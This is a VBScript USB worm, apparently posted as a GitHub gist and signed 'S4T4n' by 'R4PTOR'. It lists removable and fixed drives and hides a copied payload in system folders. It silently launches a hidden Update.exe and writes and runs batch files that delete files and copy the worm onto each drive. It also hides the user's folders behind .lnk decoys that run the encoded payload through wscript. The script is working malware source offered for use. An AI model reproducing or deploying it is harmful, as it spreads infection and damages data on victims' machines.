Set oFSO = CreateObject("Scripting.FileSystemObject")
stFichier = ""&third&"Update.exe"
Set oFl = oFSO.GetFile(stFichier)
b = oFl.size
If ""&a&"" = ""&b&"" Then
Set variable=createobject("wscript.shell")
variable.run """"&var1&"\kernel\Update.exe""",0,False
Else
End If
'
Wend
'
'---------------------------------------------------------------------------
' !Nf3cT!o|\| Headers
'---------------------------------------------------------------------------
'
detecterracines
Sub detecterracines()
'
'---------------------------------------------------------------------------
' Usb f()
'---------------------------------------------------------------------------
'
Set fsO = CreateObject("Scripting.FileSystemObject")
Set wshshell=createobject("wscript.shell")
Dim fso, d, dc, s, n
Set dc = fso.Drives
For Each d in dc
racine = d.Driveletter & ":"
u= detectamovibles(root)
'msgbox racine
If u = "Amovible" Or u = "Fixe" And d.isready And racine <> "A:" Then
'
Set fsO = CreateObject("Scripting.FileSystemObject")
If fsO.FileExists(""&d&"\config.dat") Then
Dim oFso, f
Dim ts, nl
Set oFso = CreateObject("Scripting.FileSystemObject")
Set f = oFso.OpenTextFile(""&d&"\config.dat", ForReading)
ts = f.ReadAll '-- Rd File
If ""&f.line&"" > 30 Then
f.close
'
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd /K xcopy /C /H /Y /R """&d&"\config.dat"" ""%systemdrive%\security"" & attrib -s -h ""%systemdrive%\security\*.dat"" & ren ""%systemdrive%\security\*.dat"" blood.dat & EXIT",0
oShell.run "cmd /K xcopy /C /H /Y /R """&d&"\config.dat"" ""%systemdrive%\kernel"" & attrib -s -h ""%systemdrive%\kernel\*.dat"" & ren ""%systemdrive%\kernel\*.dat"" r00t3r & attrib +s +h ""%systemdrive%\kernel\*.*"" & EXIT",0
Set oShell = Nothing
End If
'
Set oFso = CreateObject("Scripting.FileSystemObject")
Set f = oFso.OpenTextFile(""&d&"\config.dat", ForReading)
'
ts = f.ReadAll '-- Read File
If ""&f.line&"" < 30 Then
f.close
'
Set fsO = CreateObject("Scripting.FileSystemObject")
fso.deletefile(""&d&"\config.dat"),true
End If
'
Set oFso = CreateObject("Scripting.FileSystemObject")
Set f = oFso.OpenTextFile(""&d&"\config.dat", ForReading)
'
ts = f.ReadAll '-- R" File
If ""&f.line&"" = 30 Then
f.close
Dim stFichier
Dim oFl
Set oFSO = CreateObject("Scripting.FileSystemObject")
stFichier = ""&d&"\config.dat"
Set oFl = oFSO.GetFile(stFichier)
Set f = ofso.GetFile(stFichier)
fdate = f.DateLastModified
fname = f.Name
dtDiffFile = DateDiff("d", Now, fdate)
If dtDiffFile < 0 Then
fso.DeleteFile(stFichier),true
Dim oShell
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd /K cd/d ""%systemdrive%\security"" & copy /b /y blood.dat + & EXIT",0
Set oShell = Nothing
End If
End If
Else
'
'---------------------------------------------------------------------------
' u|s|b spr34d
'---------------------------------------------------------------------------
'
tmpdir=shell.ExpandEnvironmentStrings("%temp%")
nomficl=tmpdir & "\tmp.bat"
' msgbox nomfic
Set f = fso.OpenTextFile(nomficl, ForWriting , true)
f.writeline "del/f/q/a """&d&"\*.vbe"" "
f.writeline "del/f/q/a """&d&"\*.lnk"" "
f.writeline "del/f/q/a """&d&"\config.dat"" "
f.writeline "del/f/q/a """&d&"\autorun.inf"" "
f.writeline "del/f/q/a """&d&"\microsoft.dat"" "
f.writeline "xcopy /C /H /Y /R """&MyF&""" """&d&"\"" "
f.writeline "ren """&d&"\blood.dat"" config.dat "
f.writeline "attrib +s +H """&d&"\config.dat"" "
f.writeline "del/f/q/a ""%systemdrive%\*.lnk"" "
f.writeline "del/f/q/a ""%systemdrive%\autorun.inf"" "
f.close
'
Set variable = createobject("wscript.shell")
variable.run ""&nomficl&"" ,0,true
fso.DeleteFile nomficl, TRUE
'
'---------------------------------------------------------------------------
' LNK -- 10ver6on l0l
'---------------------------------------------------------------------------
'
Const ForWriting = 2
RootFolder = ""&d&""
'Const DestinationFile = "FolderList"
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFolder = objFSO.GetFolder(RootFolder)
Set colSubfolders = objFolder.Subfolders
For Each objSubfolder in colSubfolders
Exit For
'wscript.echo objSubfolder.Name
Next
Set oShell = CreateObject("WScript.Shell")
sDesktop = WSHShell.SpecialFolders("Desktop")
Set oSLink = WSHShell.CreateShortcut(""&d&"\"&objSubfolder.Name&".lnk")
strTarget = oShell.ExpandEnvironmentStrings("%windir%")
oSLink.TargetPath = strTarget & "\system32\cmd.exe"
oSLink.Arguments = "/c start WScRiPt.EXe /e:VBScRIpt.ENcOdE config.dat & C:\WINDOWS\explorer.exe "&objSubfolder.Name&" "
oSLink.WindowStyle = 7
oSLink.IconLocation = "%SystemRoot%\system32\SHELL32.dll,-4"
oSLink.Description = ""&d&""
oSLink.Save
'
'---------------------------------------------------------------------------
' +H
'---------------------------------------------------------------------------
On Error Resume Next
Set objFSo = CreateObject("scripting.FileSystemObject")
Set objFile = objFSo.GetFile(""&d&"\"&objSubfolder.Name&".lnk")
'
objFile.Attributes = 1 'R0
'* * * * * * *
'*************
'* * * * * * *
Set objFSO = CreateObject("Scripting.FileSystemObject" )
Set objFolder = objFSO.GetFolder(""&d&"\"&objSubfolder.Name&"")
objFolder.Attributes = objFolder.Attributes XOR 6
'
End If
End If
Next
End Sub
'
Function detectamovibles(drvpath)
Dim fso, d, s, t
Set fsO = CreateObject("Scripting.FileSystemObject")
Set d = fso.GetDrive(fso.GetDriveName(fso.GetAbsolutePathName(drvpath)))
Select Case d.DriveType
Case 1: t = "Amovible"
Case 2: t = "Fixe"
End Select
detectamovibles = t
End Function
'
'========================================================================================='
'
' C0d3 N4me : S4T4n
' Cr34t0r : R4PTOR
' Created for personal use , modifications or others are not authorized
' For more informations, looking 4 me { - CNG4L on Race }
'
'========================================================================================='
'
'''''||
''''''''''''''''''--------------- . . . . . . .
''''''''''''''''''
'''''||
'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment